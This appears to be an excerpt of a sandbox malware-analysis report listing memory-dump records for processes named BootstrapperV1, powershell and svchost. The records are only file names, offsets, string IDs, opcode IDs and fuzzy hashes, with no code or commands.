                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                                                                                                              • API String ID: 0-1397233021
                                                                                                                                                                                                                                              • Opcode ID: 33e3aa48dc31503417993ea4432c1143dc5fd3270246f86a9525e6780537a59e
                                                                                                                                                                                                                                              • Instruction ID: 0758bbe32fadfeb8b89341e612f3dc9a682ead84412158fc8c927752ec9b913f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33e3aa48dc31503417993ea4432c1143dc5fd3270246f86a9525e6780537a59e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6631A3B3D0D7969FE7166E38D89A0947BE0EF1121530E41F6C5488F293FE192406C627
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479812271.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 684eea5ba7cd99644b94b8437811572b14542a9a0330acfcc9fe195d73b5ef71
                                                                                                                                                                                                                                              • Instruction ID: b3a480005c68334f0b28d70e94d8d17f09cbb16a2f59dc3f680546ea87231fe4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 684eea5ba7cd99644b94b8437811572b14542a9a0330acfcc9fe195d73b5ef71
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB616BA2D0D6C50BE703AF7CD8A60E57FB0EF5236BB1900F3C5C88A167EA0464578795
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1480179899.00007FFB4B190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B190000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b190000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B=K$(B=K$(B=K$(B=K$(B=K
                                                                                                                                                                                                                                              • API String ID: 0-3403963642
                                                                                                                                                                                                                                              • Opcode ID: 339e3ce74726d892aeabf2ccbcc772d6aaeaae6a00386e5f8217c3c776c9853d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e97bee8a2d6858e40858ca90f1d727d9325e9236cfaee90b57efe202ec96874e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8141A6D390E7C24FF36A5A3989A91A57FB0EF53216B0D42F7C1CD8E193EA1924068255
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.1479812271.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: O_^4$O_^7$O_^F$O_^J
                                                                                                                                                                                                                                              • API String ID: 0-875994666
                                                                                                                                                                                                                                              • Opcode ID: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                                                                                                                                                                                              • Instruction ID: 01e918b4555d4c27ee66c542a0dad93915b3d2c6ffb24e6bf11bc7209ca09835
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 342104BB6192268ED2027B7DF8489D93764CFD523735502B2D19E8F243E914708B8AA4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K$(B>K$(B>K$(B>K$(B>K$X7o
                                                                                                                                                                                                                                              • API String ID: 0-645840614
                                                                                                                                                                                                                                              • Opcode ID: 7547e2c5261f423220d165029e74f33183f4fba6a9ea1b1f638e65f108308a3d
                                                                                                                                                                                                                                              • Instruction ID: d222f9c6539de9c34f2242533cfe5d6a10955ecfc24eec8b8fb43014b2c1e2dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7547e2c5261f423220d165029e74f33183f4fba6a9ea1b1f638e65f108308a3d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F149A291EBCA4FE796AB7888251B57FE0EF5A214B1840FFD18DC70E3D918AC05C751
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K$(B>K$(B>K$(B>K$(B>K$X7o
                                                                                                                                                                                                                                              • API String ID: 0-645840614
                                                                                                                                                                                                                                              • Opcode ID: f6ff4fbf97d15ff9b32a6a31c81f381a8b1c0f20956b3fdccc292f4623d8a7cd
                                                                                                                                                                                                                                              • Instruction ID: a5dbd053a42a0570a9b5831dd927a28954129cd8cae3e663da4ee7a23c0445e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6ff4fbf97d15ff9b32a6a31c81f381a8b1c0f20956b3fdccc292f4623d8a7cd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32B136E282EB894FE7A6EE78C855179BAD0EF1A718F0401FED54CCB0A3D918BC058751
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K$(B>K$(B>K$(B>K$X7o
                                                                                                                                                                                                                                              • API String ID: 0-538695617
                                                                                                                                                                                                                                              • Opcode ID: d5dcbe855fbd7cafc6c824da56c89ce6e385568e9f95e654f15988e983f8c55d
                                                                                                                                                                                                                                              • Instruction ID: 7952863226e5618fc03d532a3c96a3b42b2314d2d91b0af8db31eafa931e5c73
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5dcbe855fbd7cafc6c824da56c89ce6e385568e9f95e654f15988e983f8c55d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6A1079281E7C24FE793ABB889651647FE1AF1B614B5940FFC189CB0E3D90CAC09C752
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K$(B>K$(B>K$(B>K$X7o
                                                                                                                                                                                                                                              • API String ID: 0-538695617
                                                                                                                                                                                                                                              • Opcode ID: e2d4e88351f5ebb971ca383c0159f85801d2e7c85317a2067d7785a2791012ec
                                                                                                                                                                                                                                              • Instruction ID: deda91c67b285722a15a2be85fed9e6f26b55b39f08f08514051d150c65330ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2d4e88351f5ebb971ca383c0159f85801d2e7c85317a2067d7785a2791012ec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B7109E292EBC64FE796EE78C565138BAD1AF19608B5840FEC14DCB0E7DD18BC058741
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K
                                                                                                                                                                                                                                              • API String ID: 0-2534900230
                                                                                                                                                                                                                                              • Opcode ID: e09fe578d8b019c6e21d1516ec0a03e8f56a5ec9e4b05bd9d30fd6a030fea975
                                                                                                                                                                                                                                              • Instruction ID: 609b59d4730d83bdea455b009a453532df39244b6ca1e4d235a812d3aaf2e129
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e09fe578d8b019c6e21d1516ec0a03e8f56a5ec9e4b05bd9d30fd6a030fea975
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 342126B290E7898FE752EB78C5941B8BBA0EF0D218B2840FFC58DCB093C9186805C741
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1623496994.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffb4b1a0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B>K
                                                                                                                                                                                                                                              • API String ID: 0-2534900230
                                                                                                                                                                                                                                              • Opcode ID: 03ea53cefe845ef0282648fdd9e6b00433c33c56529ab44a75f4eb7569e80798
                                                                                                                                                                                                                                              • Instruction ID: b5b83a13130a6a7cf50b68805e33b34aa3847d22c2dca8cc1cf4abf24a183cb9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03ea53cefe845ef0282648fdd9e6b00433c33c56529ab44a75f4eb7569e80798
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A811EBA290EBC84FE757EBB89494178BFE1EF5E214B1841FFC58DC70A3D81868098751
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1622661229.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ad27a363108942b5a6499132486eac247de077d19d21e8330beb9f8f15700217
                                                                                                                                                                                                                                              • Instruction ID: 970ae0cbbedd159c3eca820ebea9e246ddb8ccbb2a9bfde55bd24e0c38f25860
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad27a363108942b5a6499132486eac247de077d19d21e8330beb9f8f15700217
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88512BB3A0D6854FD702BF7CE8A64E93B70EF5232AB0841B7C6848B163ED14545B8796
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1847768126.00007FFB4AFDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFDD000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4afdd000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 994642d1e60e451f169b27667e731e88d9963d91a74a198b6018cd8458148742
                                                                                                                                                                                                                                              • Instruction ID: f7830dd7f12fe3aaf62f97a6526e3923fa05c05ded30609c7eb5aac6f4d09462
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 994642d1e60e451f169b27667e731e88d9963d91a74a198b6018cd8458148742
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D41257180DBC44FE7579F38D8459A23FB4EF52224B2505EFD08ACB1A3D625B846C792
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b0f0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 593561bf9c30204a2878643deb21d4c316d5f99be04a73bf5d12c1692851800e
                                                                                                                                                                                                                                              • Instruction ID: 9ec0967d17414d1ecdc84fe796ba024ddb3f0abc1dcbedee8675fd4e10e0d9b4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 593561bf9c30204a2878643deb21d4c316d5f99be04a73bf5d12c1692851800e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A031EA7191CB4C8FDB589F5C980A6F97BE0FBA9311F00812FE449D3251DA70A855CBC2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b0f0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 19d2256f6030cb01a79a56f07d5491ffe25d2dade57de48ab55fedefd9615ba5
                                                                                                                                                                                                                                              • Instruction ID: 284a6c6f3289f505fd1ee8c590d8ef5fd69412d46c9ccad614a91d6a3d37776d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19d2256f6030cb01a79a56f07d5491ffe25d2dade57de48ab55fedefd9615ba5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB21F57090CB4C8FDB59DF68984A6E97BF0EB96321F04816BD448C3162DA74A416CB92
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b0f0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                              • Instruction ID: 34f38ac379fceacf7651eab063fd6adff6d4b2bfdd7d0428a57bc94a916a384c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1301677111CB0C8FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1849618374.00007FFB4B1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b1c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 909d0c947bdd1fd5da3cbc0b7c6e6e5b3086534881808563c98320cb42537941
                                                                                                                                                                                                                                              • Instruction ID: 8c3890b9b4344860e246cdf8d23870199bafa096e2fbb0e1801bd711fa19b0d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 909d0c947bdd1fd5da3cbc0b7c6e6e5b3086534881808563c98320cb42537941
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F09072A0CA058FE769EB6CE4414A473F0EF55324B1540B6E19DC7167DA29FC41CB90
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1849618374.00007FFB4B1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b1c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 576c01749eb2102d64fb782fae58636b1bdc88952099225f967cb2efacb5d1c7
                                                                                                                                                                                                                                              • Instruction ID: 271b63840e92c269acc0f434b2294afc15df8c942081a82d4b24b661e5ffb08f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 576c01749eb2102d64fb782fae58636b1bdc88952099225f967cb2efacb5d1c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F09AB2A0C6458FDB65EB2CE4418A8B7F0FF45324B1100F6E14DCB063DA2AEC41CB50
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1849618374.00007FFB4B1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b1c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                                                              • Instruction ID: 4aba499da6b755b22acaae2c77b8e7c0d4d350aa966e7f1266d4d360c5d97c2a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3E0E531B1C808CFAA68EA0DE1419A973E1EB9832571151A6D28EC7566CA22FC518B80
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b100000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                              • Instruction ID: d6b6772af610015bd376195b165a8f248b53ffd53b7dfa8e0f995a78d3830d20
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A501677111CB0D8FDB44EF0CE451AA5B7E0FB99364F10056DE58AC3661DA36E882CB45
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2092263719.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b100000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f760c76fb5572f51dab70dee6e24638d52866077f2280c9cf9adea4ed78291e6
                                                                                                                                                                                                                                              • Instruction ID: 59b65f6b61c9add31043c8fd87e999916b78294267e5f88134d301a0ddbf755e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f760c76fb5572f51dab70dee6e24638d52866077f2280c9cf9adea4ed78291e6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0F0C8B692DA8C4FEB81EF28D8564D47FE0FF55205B0442B7E548C70A1DA21A4498BC1
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2092263719.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b100000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                                                                                                                                                                                                              • API String ID: 0-2350917820
                                                                                                                                                                                                                                              • Opcode ID: bc87f67d5ee211d0230bc6426bec13470efd9727eb4ff8c2f699d3309f46b341
                                                                                                                                                                                                                                              • Instruction ID: 0c7b43da9ad8d3e55614bfbc3ad4df40a598ee1a949aef194e89735e7f6769e6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc87f67d5ee211d0230bc6426bec13470efd9727eb4ff8c2f699d3309f46b341
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E2126B3A186159ACA023A7CF8869D877B4DF5537935502F3E418CF013DD14A48B8B94
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cb67044c1718e168850256710079855a6ee0c5961a0dc58c957fe3930c4e7e14
                                                                                                                                                                                                                                              • Instruction ID: 6651c85744b274c3431fa1a54605c478d678eadacbef0df49eeca8f814d7b1b3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb67044c1718e168850256710079855a6ee0c5961a0dc58c957fe3930c4e7e14
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F512290B1E6C64FD787AB7888646757FE5DF87216B0801FAE0C9C72A3DD484806C342
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7f6933f81bf76320b9d6d0d51c08b5bd384fe29826b52ea816406f012eb22771
                                                                                                                                                                                                                                              • Instruction ID: c6754a7d78bbd5d13cc2a2c9052dd416dd64801ed9ce8c682a584822ad19a5c6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f6933f81bf76320b9d6d0d51c08b5bd384fe29826b52ea816406f012eb22771
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0631B4A2A0DA8E4FE745FFB8C8A14E97FB0FF95211F4441B6D189D72A3DD582806C390
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1d3eb1cf4531799d258c376aa8c44ab3bacb4b6893249372af44e6d54af82f13
                                                                                                                                                                                                                                              • Instruction ID: 3cd527d94b0b0a7ba0785d7966e47ae2ca8a2a21c73beb268029c5eaadefcb81
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d3eb1cf4531799d258c376aa8c44ab3bacb4b6893249372af44e6d54af82f13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0121A3A190DA8E4FE745EFB8C8A15EA7FF1FF55201F8440A5D149D72E3DD682801C380
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 22741b0d47edc778e98d30c2bae8517167ebb0fde7444e36531716e0f05b8624
                                                                                                                                                                                                                                              • Instruction ID: ffad72eb7a7ab49f843369e58c3a44b11af043f16c7e31735d06ce9a1b48095f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22741b0d47edc778e98d30c2bae8517167ebb0fde7444e36531716e0f05b8624
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B715FA0B29A498FEB99BB78C46D6BD76D2FF89305F404478E50EC32D2DD6DA801C750
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c0c210469918535e72571f614aeb33bae65086828c0f3c35b588198de84d936b
                                                                                                                                                                                                                                              • Instruction ID: 2312cddc7d31ff60bf69aa4de66c2c2d8860e57992d3d6c2c5f78289c047215b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0c210469918535e72571f614aeb33bae65086828c0f3c35b588198de84d936b
